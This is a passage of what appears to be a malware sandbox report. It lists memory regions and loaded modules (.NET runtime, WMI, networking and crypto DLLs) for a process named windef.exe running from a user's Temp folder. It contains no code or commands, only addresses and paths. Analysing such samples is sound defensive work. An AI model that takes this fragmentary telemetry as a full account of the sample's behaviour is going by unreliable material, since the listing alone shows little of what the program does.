end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 694 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 695 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 697 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 698 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 699 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 700 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 701 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 702 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 703 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 704 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 705 start_va = 0x460000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 720 start_va = 0x6d350000 end_va = 0x6d3a8fff monitored = 1 entry_point = 0x6d360780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 721 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 722 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 723 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 724 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 725 start_va = 0x610000 end_va = 0x6cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 726 start_va = 0x6d0000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 727 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 728 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 729 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 730 start_va = 0x590000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 731 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 732 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 733 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 734 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 735 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 736 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 737 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 738 start_va = 0x890000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 739 start_va = 0x6d2d0000 end_va = 0x6d348fff monitored = 1 entry_point = 0x6d2df82a region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 740 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 741 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 742 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 743 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 744 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 745 start_va = 0xa00000 end_va = 0xb87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 746 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 747 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 748 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 749 start_va = 0x7d0000 end_va = 0x827fff monitored = 1 entry_point = 0x8287be region_type = mapped_file name = "windef.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\windef.exe") Region: id = 750 start_va = 0xb90000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 751 start_va = 0xd20000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 755 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 756 start_va = 0x6dd00000 end_va = 0x6dd07fff monitored = 0 entry_point = 0x6dd017b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 757 start_va = 0x2120000 end_va = 0x27d0fff monitored = 1 entry_point = 0x2135d20 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 759 start_va = 0x6cb70000 end_va = 0x6d220fff monitored = 1 entry_point = 0x6cb85d20 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 761 start_va = 0x6ca70000 end_va = 0x6cb64fff monitored = 0 entry_point = 0x6cac4160 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll") Region: id = 762 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 763 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 764 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 765 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 766 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 767 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 768 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 769 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 770 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 771 start_va = 0x7d0000 end_va = 0x7d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 772 start_va = 0x7e0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 773 start_va = 0x890000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 774 start_va = 0x9f0000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 775 start_va = 0x7e0000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 776 start_va = 0x850000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 777 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 778 start_va = 0x9c0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 781 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 782 start_va = 0x2120000 end_va = 0x411ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 783 start_va = 0x4120000 end_va = 0x41bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 784 start_va = 0x41c0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 785 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 800 start_va = 0x4300000 end_va = 0x4636fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 834 start_va = 0x6a860000 end_va = 0x6ba87fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll") Region: id = 837 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 838 start_va = 0x4640000 end_va = 0x46d0fff monitored = 0 entry_point = 0x4678cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 839 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 840 start_va = 0x820000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 843 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 844 start_va = 0x830000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 845 start_va = 0x69eb0000 end_va = 0x6a85bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll") Region: id = 846 start_va = 0x6c350000 end_va = 0x6ca61fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll") Region: id = 847 start_va = 0x840000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 848 start_va = 0x6c2d0000 end_va = 0x6c34dfff monitored = 1 entry_point = 0x6c2d1140 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 849 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 850 start_va = 0x860000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 851 start_va = 0x69d20000 end_va = 0x69eacfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll") Region: id = 852 start_va = 0x690c0000 end_va = 0x69d18fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll") Region: id = 853 start_va = 0x4640000 end_va = 0x47dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 854 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 855 start_va = 0x870000 end_va = 0x871fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 856 start_va = 0x990000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 857 start_va = 0x76370000 end_va = 0x7776efff monitored = 0 entry_point = 0x7652b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 858 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 859 start_va = 0x74c60000 end_va = 0x75158fff monitored = 0 entry_point = 0x74e67610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 860 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 861 start_va = 0x77770000 end_va = 0x777b3fff monitored = 0 entry_point = 0x77777410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 862 start_va = 0x757f0000 end_va = 0x757fefff monitored = 0 entry_point = 0x757f2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 863 start_va = 0x990000 end_va = 0x990fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 864 start_va = 0x9a0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 865 start_va = 0x704d0000 end_va = 0x704e2fff monitored = 0 entry_point = 0x704d9950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 866 start_va = 0x704a0000 end_va = 0x704cefff monitored = 0 entry_point = 0x704b95e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 867 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 868 start_va = 0x9a0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 869 start_va = 0x68eb0000 end_va = 0x68fcbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\d2f554a0c84513cd793fdcd77a86dab1\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\d2f554a0c84513cd793fdcd77a86dab1\\system.management.ni.dll") Region: id = 870 start_va = 0x9a0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 871 start_va = 0x4640000 end_va = 0x467ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 872 start_va = 0x4680000 end_va = 0x477ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 873 start_va = 0x47d0000 end_va = 0x47dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 874 start_va = 0x7fe60000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe60000" filename = "" Region: id = 875 start_va = 0x7fe50000 end_va = 0x7fe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe50000" filename = "" Region: id = 876 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 877 start_va = 0x75860000 end_va = 0x758e3fff monitored = 0 entry_point = 0x75886220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 878 start_va = 0x9b0000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 879 start_va = 0x6d2b0000 end_va = 0x6d2cbfff monitored = 0 entry_point = 0x6d2baa90 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 880 start_va = 0x6c260000 end_va = 0x6c2c6fff monitored = 0 entry_point = 0x6c27b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 881 start_va = 0x4780000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 882 start_va = 0x47e0000 end_va = 0x48dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 883 start_va = 0x761f0000 end_va = 0x7624efff monitored = 0 entry_point = 0x761f4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 884 start_va = 0x48e0000 end_va = 0x491ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 885 start_va = 0x4920000 end_va = 0x4a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004920000" filename = "" Region: id = 886 start_va = 0x4a20000 end_va = 0x4a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 887 start_va = 0x4a60000 end_va = 0x4b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a60000" filename = "" Region: id = 888 start_va = 0x4b60000 end_va = 0x4b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 889 start_va = 0x4ba0000 end_va = 0x4c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 890 start_va = 0x6c250000 end_va = 0x6c25cfff monitored = 0 entry_point = 0x6c253520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 891 start_va = 0x6c240000 end_va = 0x6c249fff monitored = 1 entry_point = 0x6c2439f9 region_type = mapped_file name = "wminet_utils.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WMINet_Utils.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\wminet_utils.dll") Region: id = 892 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 893 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 894 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1256 start_va = 0x6c220000 end_va = 0x6c230fff monitored = 0 entry_point = 0x6c228fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1257 start_va = 0x69000000 end_va = 0x690befff monitored = 0 entry_point = 0x69031e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1346 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1347 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1348 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1349 start_va = 0x9e0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 1350 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 1351 start_va = 0x4ca0000 end_va = 0x4caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 1352 start_va = 0x4cb0000 end_va = 0x4cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004cb0000" filename = "" Region: id = 1353 start_va = 0x9e0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 1354 start_va = 0x68c00000 end_va = 0x68ea7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.runtime.serialization.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runteb92aa12#\\43ca3f2fcd379964cef1dc5898cb9248\\System.Runtime.Serialization.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runteb92aa12#\\43ca3f2fcd379964cef1dc5898cb9248\\system.runtime.serialization.ni.dll") Region: id = 1355 start_va = 0x9e0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 1356 start_va = 0x68fe0000 end_va = 0x68ffdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "smdiagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\SMDiagnostics\\607f34b8be4f2014b99872617699b357\\SMDiagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\smdiagnostics\\607f34b8be4f2014b99872617699b357\\smdiagnostics.ni.dll") Region: id = 1357 start_va = 0x68b10000 end_va = 0x68bfefff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\1b51e779650e38bb712f3e535efcf132\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\1b51e779650e38bb712f3e535efcf132\\system.configuration.ni.dll") Region: id = 1358 start_va 